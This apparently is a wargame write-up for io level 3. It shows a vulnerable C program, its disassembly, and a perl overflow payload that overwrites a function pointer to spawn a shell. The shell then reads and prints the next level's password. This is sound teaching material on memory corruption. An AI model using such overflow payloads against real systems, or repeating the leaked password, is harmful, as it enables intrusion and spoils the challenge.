summary: simple bof
level3@io:/levels$ cat level03.c
//bla, based on work by beach
#include <stdio.h>
#include <string.h>
#include <unistd.h>
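/*
 * Target function of this level: prints a marker and replaces the
 * process image with /bin/sh.  main() never calls it directly.
 *
 * execl() returns only on failure, so the perror() line is reached
 * only when the exec itself fails.  The argument-list sentinel is cast
 * to (char *) because NULL may expand to a plain int 0, which has the
 * wrong size for a pointer in a variadic call on some ABIs.  The
 * prototype comes from <unistd.h>; without it execl() is implicitly
 * declared, which C99 and later no longer allow.
 */
void good(void)
{
    puts("Win.");
    execl("/bin/sh", "sh", (char *)NULL);
    perror("execl");
}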
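/*
 * Default target of main()'s function pointer.  Prints its own address
 * and good()'s so the player can see how far apart the two are.
 *
 * %p expects a void *, so the function pointers are cast explicitly;
 * converting a function pointer to void * is guaranteed by POSIX rather
 * than by ISO C, which holds on the system this level runs on.
 */
void bad(void)
{
    printf("I'm so sorry, you're at %p and you want to be at %p\n",
           (void *)bad, (void *)good);
}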
/*
 * Entry point of the level.  Copies argv[1] into a fixed-size stack
 * buffer and then calls through a function pointer that lives in the
 * same stack frame.
 *
 * argc/argv: exactly one argument is required and it must be at least
 * 4 bytes long; otherwise the program exits without doing anything.
 * envp is unused.
 *
 * Returns 0 in every case.
 */
int main(int argc, char **argv, char **envp)
{
/* Initialised to bad; nothing below assigns it again on purpose. */
void (*functionpointer)(void) = bad;
/* 50 bytes, declared after functionpointer.  Where the compiler places
 * the two relative to each other is not guaranteed; in the build
 * analysed here functionpointer sits above buffer in the frame (the
 * disassembly shows ebp-0xc vs ebp-0x58). */
char buffer[50];
if(argc != 2 || strlen(argv[1]) < 4)
return 0;
/* The length comes from the argument, not from sizeof buffer, so any
 * argument longer than 50 bytes overwrites the adjacent stack slots.
 * A copy bounded by sizeof buffer would close this.  No terminator is
 * copied, but buffer is never read as a string afterwards. */
memcpy(buffer, argv[1], strlen(argv[1]));
/* Zeroes every copied byte except the last 4.  It uses the same
 * unbounded length, so it also writes past buffer for long arguments.
 * The < 4 check above keeps the subtraction from wrapping. */
memset(buffer, 0, strlen(argv[1]) - 4);
/* %p formally expects a void *; a function pointer is passed here. */
printf("This is exciting we're going to %p\n", functionpointer);
/* Indirect call through whatever functionpointer holds by now. */
functionpointer();
return 0;
}
소스를 보면 buffer 아래에 functionpointer가 선언되어 있고, overflow시켜 functionpointer를 good의 주소로 바꿔주면 된다.
(gdb) info func
All defined functions:
Non-debugging symbols:
0x0804830c _init
0x0804834c __gmon_start__
0x0804834c __gmon_start__@plt
0x0804835c memset
0x0804835c memset@plt
0x0804836c __libc_start_main
0x0804836c __libc_start_main@plt
0x0804837c execl
0x0804837c execl@plt
0x0804838c memcpy
0x0804838c memcpy@plt
0x0804839c strlen
0x0804839c strlen@plt
0x080483ac printf
0x080483ac printf@plt
0x080483bc puts
0x080483bc puts@plt
0x080483d0 _start
0x08048400 __do_global_dtors_aux
0x08048440 frame_dummy
0x08048474 good
0x080484a4 bad
0x080484c8 main
0x08048580 __libc_csu_fini
0x08048590 __libc_csu_init
0x080485ea __i686.get_pc_thunk.bx
0x080485f0 __do_global_ctors_aux
0x08048620 _fini
0x080484c8 <+0>: push ebp
0x080484c9 <+1>: mov ebp,esp
0x080484cb <+3>: sub esp,0x78
0x080484ce <+6>: and esp,0xfffffff0
0x080484d1 <+9>: mov eax,0x0
0x080484d6 <+14>: sub esp,eax
0x080484d8 <+16>: mov DWORD PTR [ebp-0xc],0x80484a4
0x080484df <+23>: cmp DWORD PTR [ebp+0x8],0x2
0x080484e3 <+27>: jne 0x80484fc <main+52>
0x080484e5 <+29>: mov eax,DWORD PTR [ebp+0xc]
0x080484e8 <+32>: add eax,0x4
0x080484eb <+35>: mov eax,DWORD PTR [eax]
0x080484ed <+37>: mov DWORD PTR [esp],eax
0x080484f0 <+40>: call 0x804839c <strlen@plt>
0x080484f5 <+45>: cmp eax,0x3
0x080484f8 <+48>: jbe 0x80484fc <main+52>
0x080484fa <+50>: jmp 0x8048505 <main+61>
0x080484fc <+52>: mov DWORD PTR [ebp-0x5c],0x0
0x08048503 <+59>: jmp 0x8048579 <main+177>
0x08048505 <+61>: mov eax,DWORD PTR [ebp+0xc]
0x08048508 <+64>: add eax,0x4
0x0804850b <+67>: mov eax,DWORD PTR [eax]
0x0804850d <+69>: mov DWORD PTR [esp],eax
0x08048510 <+72>: call 0x804839c <strlen@plt>
0x08048515 <+77>: mov DWORD PTR [esp+0x8],eax
0x08048519 <+81>: mov eax,DWORD PTR [ebp+0xc]
0x0804851c <+84>: add eax,0x4
0x0804851f <+87>: mov eax,DWORD PTR [eax]
0x08048521 <+89>: mov DWORD PTR [esp+0x4],eax
0x08048525 <+93>: lea eax,[ebp-0x58]
0x08048528 <+96>: mov DWORD PTR [esp],eax
0x0804852b <+99>: call 0x804838c <memcpy@plt>
0x08048530 <+104>: mov eax,DWORD PTR [ebp+0xc]
0x08048533 <+107>: add eax,0x4
0x08048536 <+110>: mov eax,DWORD PTR [eax]
0x08048538 <+112>: mov DWORD PTR [esp],eax
0x0804853b <+115>: call 0x804839c <strlen@plt>
0x08048540 <+120>: sub eax,0x4
0x08048543 <+123>: mov DWORD PTR [esp+0x8],eax
0x08048547 <+127>: mov DWORD PTR [esp+0x4],0x0
0x0804854f <+135>: lea eax,[ebp-0x58]
0x08048552 <+138>: mov DWORD PTR [esp],eax
0x08048555 <+141>: call 0x804835c <memset@plt>
0x0804855a <+146>: mov eax,DWORD PTR [ebp-0xc]
0x0804855d <+149>: mov DWORD PTR [esp+0x4],eax
0x08048561 <+153>: mov DWORD PTR [esp],0x80486c0
0x08048568 <+160>: call 0x80483ac <printf@plt>
0x0804856d <+165>: mov eax,DWORD PTR [ebp-0xc]
0x08048570 <+168>: call eax
0x08048572 <+170>: mov DWORD PTR [ebp-0x5c],0x0
0x08048579 <+177>: mov eax,DWORD PTR [ebp-0x5c]
0x0804857c <+180>: leave
0x0804857d <+181>: ret
level3@io:/levels$ ./level03 `perl -e 'print "a"x76,"\x74\x84\x04\x08"'`
This is exciting we're going to 0x8048474
Win.
sh-4.2$ cat /home/level4/.pass
9C4Jxjc3O3IjB7nXej